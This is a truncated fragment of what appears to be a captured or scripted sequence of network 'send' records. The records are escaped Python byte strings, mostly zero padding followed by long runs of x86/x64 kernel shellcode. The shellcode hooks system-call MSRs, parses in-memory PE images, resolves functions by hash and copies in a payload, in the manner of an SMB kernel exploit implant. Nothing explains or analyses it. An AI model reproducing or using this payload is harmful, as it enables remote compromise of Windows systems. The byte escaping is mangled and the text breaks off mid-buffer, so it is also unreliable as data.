b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 20, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\